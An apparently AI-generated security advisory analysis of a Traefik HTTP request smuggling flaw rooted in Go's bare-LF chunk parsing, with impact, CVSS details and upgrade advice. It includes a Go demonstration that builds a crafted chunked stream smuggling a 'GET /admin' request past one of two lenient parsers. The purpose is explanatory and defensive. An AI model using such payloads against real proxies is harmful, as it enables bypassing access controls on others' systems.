
GHSA-5423-jcjm-2gpv
vulnerability analysis and mitigation

Overview

GHSA-5423-jcjm-2gpv is a critical HTTP Request Smuggling advisory for Traefik, published on April 18, 2025. It affects Traefik versions before v2.11.24, v3.3.x before v3.3.6, and v3.4.x before v3.4.0-rc2. The root cause is not Traefik's own code but the Go net/http package it is built on: the chunked transfer-coding reader accepted a chunk-size line terminated by a bare LF where HTTP requires CRLF (GitHub Advisory).

Technical details

In chunked transfer coding each chunk is introduced by a chunk-size line: a hexadecimal length, an optional chunk extension introduced by a semicolon, and a CRLF. Unpatched net/http treated a bare LF as the end of that line, so for it the chunk data began immediately after the LF. A server or proxy on the same connection path that instead treats a bare LF inside the chunk extension as ordinary extension text keeps reading the line up to the next CRLF, so for it the chunk data begins later. Both parsers then count the same chunk length from different offsets, so they disagree about where the request body ends and where the next request on the connection begins, which is exactly the condition an attacker needs to smuggle a request past one of them. The advisory is rated Critical with a CVSS 3.1 score of 9.1 and vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N: reachable over the network, no privileges or user interaction required, high confidentiality and integrity impact, no availability impact (GitHub Advisory).
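The framing disagreement described above, as an added example that is not code from Traefik, Go, or the advisory: a small chunked-body decoder in Go with three line-termination policies, the bare-LF-terminates behaviour of unpatched net/http, the bare-LF-as-extension-text behaviour of the second server the advisory presupposes, and the strict CRLF-only behaviour a patched parser should have. The request stream, the padding scheme, the type and function names and the GET /admin request are all constructed for this demonstration and are not taken from any real exploit.

```go
package main

import (
	"fmt"
	"io"
	"strconv"
	"strings"
)

// LineMode selects how a chunk-size line may end. The two lenient modes model the
// behaviours the advisory describes; Strict follows RFC 9112 and rejects the line.
type LineMode int

const (
	Strict            LineMode = iota // only CRLF ends the line; a bare LF is an error
	BareLFTerminates                  // a bare LF ends the line (the unpatched net/http behaviour)
	BareLFInExtension                 // a bare LF is kept as extension text; the line runs on to the next CRLF
)

// readLine returns the line starting at pos and the offset just past its terminator.
func readLine(data []byte, pos int, mode LineMode) (string, int, error) {
	for i := pos; i < len(data); i++ {
		if data[i] != '\n' {
			continue
		}
		if i > pos && data[i-1] == '\r' {
			return string(data[pos : i-1]), i + 1, nil
		}
		if mode == BareLFTerminates {
			return string(data[pos:i]), i + 1, nil
		}
		if mode == Strict {
			return "", 0, fmt.Errorf("bare LF at offset %d in chunk-size line", i)
		}
		// BareLFInExtension: the LF is taken as extension text; keep scanning for CRLF
	}
	return "", 0, io.ErrUnexpectedEOF
}

// parseChunked decodes one chunked message body and returns the decoded body plus
// the bytes that follow it, which a server would go on to parse as the next request.
func parseChunked(data []byte, mode LineMode) ([]byte, []byte, error) {
	var body []byte
	pos := 0
	for {
		line, next, err := readLine(data, pos, mode)
		if err != nil {
			return nil, nil, err
		}
		sizeField, _, _ := strings.Cut(line, ";") // drop any chunk extension
		size, err := strconv.ParseUint(sizeField, 16, 32)
		if err != nil {
			return nil, nil, fmt.Errorf("bad chunk size %q: %w", sizeField, err)
		}
		if size == 0 { // terminal chunk; trailer fields are not supported here
			trailer, end, err := readLine(data, next, mode)
			if err != nil {
				return nil, nil, err
			}
			if trailer != "" {
				return nil, nil, fmt.Errorf("unexpected trailer line %q", trailer)
			}
			return body, data[end:], nil
		}
		end := next + int(size)
		if end+2 > len(data) || data[end] != '\r' || data[end+1] != '\n' {
			return nil, nil, fmt.Errorf("chunk data at offset %d is not followed by CRLF", next)
		}
		body = append(body, data[next:end]...)
		pos = end + 2
	}
}

// smuggledRequest is a constructed request that one parser reports as the
// next request on the connection while the other swallows it as body data.
const smuggledRequest = "GET /admin HTTP/1.1\r\nHost: backend\r\n\r\n"

// buildSmugglingStream assembles a chunked body (constructed for this example) whose
// chunk-size line carries an extension and ends in a bare LF. One side reads pad+CRLF
// as the chunk data; the other counts the same length over the CRLF, "0\r\n\r\n" and smuggled.
func buildSmugglingStream(smuggled string) []byte {
	pad := strings.Repeat("a", len("0\r\n\r\n")+len(smuggled))
	var b strings.Builder
	fmt.Fprintf(&b, "%x;ext\n", len(pad)+2) // bare LF where CRLF is required
	b.WriteString(pad + "\r\n\r\n")
	b.WriteString("0\r\n\r\n") // end of body for the bare-LF-terminates parser
	b.WriteString(smuggled)
	b.WriteString("\r\n0\r\n\r\n") // end of body for the extension-swallowing parser
	return []byte(b.String())
}

func main() {
	stream := buildSmugglingStream(smuggledRequest)
	for mode, name := range []string{"strict (patched)", "bare LF terminates", "bare LF in extension"} {
		body, rest, err := parseChunked(stream, LineMode(mode)) // index order matches the constants
		fmt.Printf("%-20s err=%v body=%q next-on-wire=%q\n", name, err, body, rest)
	}
}
```

Running it prints one line per policy: the strict parser rejects the stream at the first bare LF, while the two lenient parsers both accept it yet disagree about where the body ends, so one of them goes on to parse GET /admin as a second request on the connection and the other never sees it as a request at all. That gap, not either lenient behaviour on its own, is the smuggling primitive, which is why the advisory conditions exploitability on a second server. The strict policy is also the check to apply when auditing any other component on the path: a chunk-size line containing an LF not preceded by CR must be rejected, never tolerated.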

Impact

The parser that counts the smuggled bytes as body never sees them as a request, so any per-request control it applies (routing rules, authentication or authorization middleware, access logging, rate limiting) is skipped for the request that the other parser then acts on. The CVSS vector reflects this as high confidentiality and integrity impact with no availability impact, and the 9.1 score means successful exploitation against an affected Traefik installation can yield unauthorized access to backends and manipulation of the data sent to them (GitHub Advisory). Exploitability in a given deployment additionally requires a second parser on the same connection path that accepts the bare LF as extension text, but the upgrade should not wait on that determination.

Mitigation and workarounds

Upgrade to Traefik v2.11.24, v3.3.6, or v3.4.0-rc2. Because the defect is in Go's net/http, the fix is a rebuild of Traefik with a Go release that rejects a chunk-size line terminated by a bare LF (the net/http fix shipped in Go 1.23.8 and 1.24.2); the advisory lists no configuration workaround. Any other chunked-body parser on the same connection path (upstream proxies, CDNs, backends) should be checked for the complementary behaviour of accepting a bare LF as chunk-extension text, since the smuggling requires both. The same releases also clean the incoming request path before it is matched against router rules and sent to backends, collapsing /../, /./ and duplicate-slash segments; that is a separate hardening shipped alongside the smuggling fix, not the fix itself (Traefik Release). After upgrading, `traefik version` reports both the Traefik version and the Go version it was built with, which is the quick check that the rebuild actually landed.

Source: This report was generated using AI.
